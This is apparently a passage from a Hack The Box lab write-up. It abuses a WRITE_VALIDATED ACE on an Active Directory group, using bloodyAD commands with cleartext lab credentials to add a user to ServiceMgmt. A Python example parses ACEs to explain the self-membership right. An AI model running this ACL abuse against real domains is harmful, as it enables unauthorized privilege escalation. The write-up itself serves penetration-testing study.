ServiceMgmt
One of the more unusual things about the target domain is the presence of a single non-default group, ServiceMgmt
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get search 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' --resolve-sd
distinguishedname: CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
cn: ServiceMgmt
dscorepropagationdata: 2023-04-08 09:07:56+00:00; 1601-01-01 00:00:00+00:00
description: Group used for Services Account management
displayname: ServiceMgmt
grouptype: -2147483646
instancetype: 4
member: CN=fflock,CN=Users,DC=rebound,DC=htb; CN=ppaul,CN=Users,DC=rebound,DC=htb
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
ntsecuritydescriptor.acl.0.right: READ_PROP
ntsecuritydescriptor.acl.0.objecttype: Token-Groups-Global-And-Universal
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.1.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.1.objecttype: Send-To
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: oorend
ntsecuritydescriptor.acl.2.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.2.objecttype: Self
ntsecuritydescriptor.acl.3.type: == ALLOWED ==
ntsecuritydescriptor.acl.3.trustee: Domain Admins; LOCAL_SYSTEM; ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.3.right: GENERIC_ALL
ntsecuritydescriptor.acl.3.objecttype: Self
ntsecuritydescriptor.acl.4.type: == ALLOWED ==
ntsecuritydescriptor.acl.4.trustee: AUTHENTICATED_USERS; PRINCIPAL_SELF
ntsecuritydescriptor.acl.4.right: GENERIC_READ
ntsecuritydescriptor.acl.4.objecttype: Self
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.5.right: READ_PROP
ntsecuritydescriptor.acl.5.objecttype: Account-Restrictions; Group-Membership; Remote-Access-Information; General-Information; Logon-Information
ntsecuritydescriptor.acl.5.inheritedobjecttype: User; inetOrgPerson
ntsecuritydescriptor.acl.5.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: Key Admins; Enterprise Key Admins
ntsecuritydescriptor.acl.6.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.6.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.6.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: CREATOR_OWNER; PRINCIPAL_SELF
ntsecuritydescriptor.acl.7.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.7.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.7.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.7.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.8.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.8.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.8.right: READ_PROP
ntsecuritydescriptor.acl.8.objecttype: Token-Groups
ntsecuritydescriptor.acl.8.inheritedobjecttype: Computer; User
ntsecuritydescriptor.acl.8.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.9.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.9.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.9.right: READ_PROP
ntsecuritydescriptor.acl.9.objecttype: Token-Groups
ntsecuritydescriptor.acl.9.inheritedobjecttype: Group
ntsecuritydescriptor.acl.9.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.10.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: WRITE_PROP
ntsecuritydescriptor.acl.10.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.10.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.10.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.11.right: GENERIC_READ
ntsecuritydescriptor.acl.11.objecttype: Self
ntsecuritydescriptor.acl.11.inheritedobjecttype: User; inetOrgPerson
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.12.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.12.right: GENERIC_READ
ntsecuritydescriptor.acl.12.objecttype: Self
ntsecuritydescriptor.acl.12.inheritedobjecttype: Group
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.13.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.13.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.13.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.14.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.14.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.14.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.14.objecttype: Private-Information
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.15.type: == ALLOWED ==
ntsecuritydescriptor.acl.15.trustee: Enterprise Admins
ntsecuritydescriptor.acl.15.right: GENERIC_ALL
ntsecuritydescriptor.acl.15.objecttype: Self
ntsecuritydescriptor.acl.15.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.16.type: == ALLOWED ==
ntsecuritydescriptor.acl.16.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.16.right: LIST_CHILD
ntsecuritydescriptor.acl.16.objecttype: Self
ntsecuritydescriptor.acl.16.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.17.type: == ALLOWED ==
ntsecuritydescriptor.acl.17.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.17.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.17.objecttype: Self
ntsecuritydescriptor.acl.17.flags: CONTAINER_INHERIT; INHERITED
name: ServiceMgmt
objectcategory: CN=Group,CN=Schema,CN=Configuration,DC=rebound,DC=htb
objectclass: top; group
objectguid: {a7ea5dce-8c4f-40b5-8863-64fd3c27582d}
objectsid: S-1-5-21-4078382237-1492182817-2568127209-7683
samaccountname: ServiceMgmt
samaccounttype: 268435456
usnchanged: 169858
usncreated: 69317
whenchanged: 2023-09-11 12:08:01+00:00
whencreated: 2023-04-08 09:07:56+00:00
With the --resolve-sd flag, bloodyAD decodes the group's nTSecurityDescriptor attribute (its security descriptor, SD) into readable form: the owner, the control flags and every ACE (Access Control Entry) of the DACL (Discretionary Access Control List), with trustee SIDs resolved to names
There are a lot of ACEs to go through, most of them inherited defaults, but one stands out
WRITE_VALIDATED
ACE 2 on the ServiceMgmt group grants the oorend user WRITE_VALIDATED on the object itself (objecttype: Self), and it is a plain ALLOWED ACE rather than an ALLOWED_OBJECT ACE
- WRITE_VALIDATED is bloodyAD's name for the standard access-mask bit RIGHT_DS_WRITE_PROPERTY_EXTENDED (ADS_RIGHT_DS_SELF, 0x00000008): the right to perform validated writes. Because this ACE carries no object type GUID, it is not narrowed to a single validated write; on a group object the relevant one is Self-Membership, which lets the trustee add or remove only its own account in the member attribute (BloodHound reports this as an AddSelf edge)
- The oorend user was confirmed during the earlier password spraying attack to share the same password as ldap_monitor
ACE 4, which grants AUTHENTICATED_USERS GENERIC_READ, is also what lets me enumerate the group as the ldap_monitor account, which qualifies simply by being part of Authenticated Users
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD add --help
usage: bloodyAD add [-h]
{computer,dcsync,dnsRecord,genericAll,groupMember,rbcd,shadowCredentials,uac,user} ...
options:
-h, --help show this help message and exit
add commands:
{computer,dcsync,dnsRecord,genericAll,groupMember,rbcd,shadowCredentials,uac,user}
computer Adds new computer
dcsync Adds DCSync right on domain to provided trustee (Requires to own or to have
WriteDacl on domain object)
dnsRecord This function adds a new DNS record into an AD environment.
genericAll Gives full control to trustee on target (you must own the object or have WriteDacl)
groupMember Adds a new member (user, group, computer) to group
rbcd Adds Resource Based Constraint Delegation for service on target, used to
impersonate a user on target with service (Requires "Write" permission on target's
msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)
shadowCredentials Adds Key Credentials to target, used to impersonate target with added credentials
uac Adds property flags altering user/computer object behavior
user Adds a new user
As bloodyAD also supports the add command, I will attempt a write operation against the ServiceMgmt group as the oorend user. First, a baseline of that user's current group memberships
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u ldap_monitor -p '1GR8t@$$4u' --host dc01.rebound.htb get membership oorend
distinguishedName: CN=Domain Users,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-513
sAMAccountName: Domain Users
distinguishedName: CN=Users,CN=Builtin,DC=rebound,DC=htb
objectSid: S-1-5-32-545
sAMAccountName: Users
The oorend user is currently a member only of the default groups: Domain Users (RID 513) in the domain and the built-in Users group (well-known SID S-1-5-32-545)
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' 'CN=oorend,CN=Users,DC=rebound,DC=htb'
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
The WRITE_VALIDATED right, unrestricted by an object type GUID, includes the Self-Membership validated write, so oorend is able to add itself to the ServiceMgmt group. The validation is performed by the DC: the DN being added must be the caller's own account, so this right on its own would not allow adding any other principal
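To make the reading of that ACE concrete, here is an added example (an illustration written for this page, not code from the original write-up or from bloodyAD) that serialises and parses the MS-DTYP ACE structures and applies the rule a DC applies to a group's member attribute: a WRITE_VALIDATED ACE with no object type GUID, or with the Self-Membership GUID, lets the trustee add only itself; WRITE_PROP on the member attribute or GENERIC_ALL lets it add anyone; an INHERIT_ONLY ACE grants nothing on the group itself. It covers both the interpretation of ACE 2 above and the successful add here. Assumptions: the domain SID is the one from the bloodyAD output, but oorend's RID (1105) is invented; the Self-Membership/member GUID and the Validated-SPN GUID are the MS-ADTS values; property sets are not expanded.

```python
import struct
import uuid

# Added example, not code from the write-up or from bloodyAD.
# Access-mask bits from MS-ADTS; bloodyAD prints 0x8 (RIGHT_DS_WRITE_PROPERTY_EXTENDED) as WRITE_VALIDATED.
ADS_RIGHT_DS_WRITE_VALIDATED = 0x00000008
ADS_RIGHT_DS_WRITE_PROP = 0x00000020
ADS_RIGHT_GENERIC_ALL = 0x10000000
ADS_RIGHT_GENERIC_WRITE = 0x40000000  # maps to WRITE_PROP | WRITE_VALIDATED | READ_CONTROL on DS objects

# MS-ADTS: the "Self-Membership" validated write and the `member` attribute share one GUID,
# so the access-mask bit, not the object type, decides which of the two an ACE grants.
SELF_MEMBERSHIP_GUID = uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2")
MEMBER_ATTRIBUTE_GUID = SELF_MEMBERSHIP_GUID
VALIDATED_SPN_GUID = uuid.UUID("f3a64788-5306-11d1-a9c5-0000f80367c1")  # used only as a negative case

# MS-DTYP ACE constants.
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
INHERIT_ONLY_ACE = 0x08  # ACE flag: applies to child objects only
ACE_OBJECT_TYPE_PRESENT = 0x01
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02


def build_sid(sid_str):
    """Encode 'S-1-5-21-...' into the binary SID carried inside an ACE."""
    parts = sid_str.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf):
    subs = struct.unpack_from("<%dI" % buf[1], buf, 8)
    return "S-%d-%d-%s" % (buf[0], int.from_bytes(buf[2:8], "big"), "-".join(map(str, subs)))


def build_ace(ace_type, ace_flags, mask, sid_str, object_type=None):
    """Serialize an ACCESS_ALLOWED_ACE or ACCESS_ALLOWED_OBJECT_ACE (object type GUID only)."""
    body = struct.pack("<I", mask)
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE_TYPE:
        if object_type is None:
            body += struct.pack("<I", 0)
        else:
            body += struct.pack("<I", ACE_OBJECT_TYPE_PRESENT) + object_type.bytes_le
    body += build_sid(sid_str)
    return struct.pack("<BBH", ace_type, ace_flags, 4 + len(body)) + body


def parse_ace(buf):
    """Decode header, mask, optional object type GUID and trustee SID of one ACE."""
    ace_type, ace_flags, size = struct.unpack_from("<BBH", buf, 0)
    if ace_type not in (ACCESS_ALLOWED_ACE_TYPE, ACCESS_ALLOWED_OBJECT_ACE_TYPE):
        raise ValueError("unsupported ACE type 0x%02x" % ace_type)
    mask = struct.unpack_from("<I", buf, 4)[0]
    off, object_type = 8, None
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE_TYPE:
        obj_flags = struct.unpack_from("<I", buf, 8)[0]
        off = 12
        if obj_flags & ACE_OBJECT_TYPE_PRESENT:
            object_type = uuid.UUID(bytes_le=bytes(buf[off:off + 16]))
            off += 16
        if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
            off += 16  # skip the inherited object type GUID; irrelevant to this decision
    return {"flags": ace_flags, "mask": mask, "object_type": object_type,
            "trustee": parse_sid(buf[off:size])}


def member_write_level(ace):
    """'all' = may add anyone to the group, 'self' = may add/remove only its own account, None = neither.
    Property sets (the Membership set contains `member`) are not expanded here."""
    if ace["flags"] & INHERIT_ONLY_ACE:
        return None  # an inherit-only ACE grants nothing on the object it sits on
    mask, obj = ace["mask"], ace["object_type"]
    if mask & ADS_RIGHT_GENERIC_ALL:
        return "all"
    if mask & (ADS_RIGHT_DS_WRITE_PROP | ADS_RIGHT_GENERIC_WRITE) and obj in (None, MEMBER_ATTRIBUTE_GUID):
        return "all"
    # A plain ACCESS_ALLOWED ACE (no GUID) with WRITE_VALIDATED covers every validated write,
    # Self-Membership included; an object ACE covers only the validated write it names.
    if mask & (ADS_RIGHT_DS_WRITE_VALIDATED | ADS_RIGHT_GENERIC_WRITE) and obj in (None, SELF_MEMBERSHIP_GUID):
        return "self"
    return None


# Constructed samples: domain SID from the bloodyAD output above; RID 1105 for oorend is invented.
OOREND_SID = "S-1-5-21-4078382237-1492182817-2568127209-1105"
SAMPLE_ACES = {
    "oorend WRITE_VALIDATED, objecttype Self (as on ServiceMgmt)":
        build_ace(ACCESS_ALLOWED_ACE_TYPE, 0, ADS_RIGHT_DS_WRITE_VALIDATED, OOREND_SID),
    "WRITE_VALIDATED limited to Self-Membership":
        build_ace(ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, ADS_RIGHT_DS_WRITE_VALIDATED, OOREND_SID, SELF_MEMBERSHIP_GUID),
    "WRITE_VALIDATED limited to Validated-SPN":
        build_ace(ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, ADS_RIGHT_DS_WRITE_VALIDATED, OOREND_SID, VALIDATED_SPN_GUID),
    "WRITE_PROP on the member attribute":
        build_ace(ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, ADS_RIGHT_DS_WRITE_PROP, OOREND_SID, MEMBER_ATTRIBUTE_GUID),
    "WRITE_VALIDATED but INHERIT_ONLY":
        build_ace(ACCESS_ALLOWED_ACE_TYPE, INHERIT_ONLY_ACE, ADS_RIGHT_DS_WRITE_VALIDATED, OOREND_SID),
}


def evaluate_samples():
    """Map each sample description to the membership-write level it grants."""
    return {name: member_write_level(parse_ace(raw)) for name, raw in SAMPLE_ACES.items()}


if __name__ == "__main__":
    for name, level in evaluate_samples().items():
        print("%-62s -> %s" % (name, level))
```

The first sample reproduces ACE 2 from the listing and evaluates to "self", which is exactly what the add above exercised; the Validated-SPN and INHERIT_ONLY samples show the two ways an ACE that still prints as WRITE_VALIDATED would not have allowed it.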
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb get membership oorend
distinguishedName: CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-7683
sAMAccountName: ServiceMgmt
distinguishedName: CN=Domain Users,CN=Users,DC=rebound,DC=htb
objectSid: S-1-5-21-4078382237-1492182817-2568127209-513
sAMAccountName: Domain Users
distinguishedName: CN=Users,CN=Builtin,DC=rebound,DC=htb
objectSid: S-1-5-32-545
sAMAccountName: Users
Like so. Now I believe this will lead somewhere further